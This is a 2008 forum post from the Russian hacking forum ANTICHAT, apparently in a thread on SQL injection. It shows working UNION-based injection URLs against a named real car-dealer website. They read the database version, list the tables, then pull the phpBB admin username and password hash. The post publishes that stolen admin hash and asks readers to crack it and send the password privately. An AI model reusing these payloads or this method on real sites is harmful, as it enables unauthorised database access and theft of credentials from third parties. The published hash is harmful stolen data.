HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 11.07.2008, 16:00
Мистерео
Познающий
Регистрация: 07.08.2006
Сообщений: 66
С нами: 10399666

Репутация: 94
По умолчанию
блин что вы курите...
Вот смотрим версию
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+version(),2,3/*
Ага версия пятая смотрим таблицы
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+table_name,2,3+from+information_schema.tables+limit+1,1/*
находим таблицы вот актуальные
Код:
Action
Akssesuar
Colors
Complekt
Foto
Foto_old
Marks
Menu
Models
Old_avto
People
Texts
Vacancy
accessories
all_details
details
documentation
files
files_up
forum
graphic_people
inner
news
news_details
дальше идут таблицы форума (на движке phpbb)
среди них есть таблица phpbb_users
роем на колонки
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+column_name,2,3+from+information_schema.columns+where+table_name=0x70687062625f7573657273+limit+1,1/*
Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users
находим нужные нам колонки username и user_password и составляем запрос
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+concat_ws(0x3a,username,user_password),2,3+from+phpbb_users+limit+1,1/*
Получаем логин админа и зашифрованый пароль а именно
admin:178f6c2365ac7511b4bf37c8e89cc678

кто расшифрует скиньте пасс в личку плиз.

Вот и все
Последний раз редактировалось Мистерео; 11.07.2008 в 16:03..
 
Ответить с цитированием
 



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.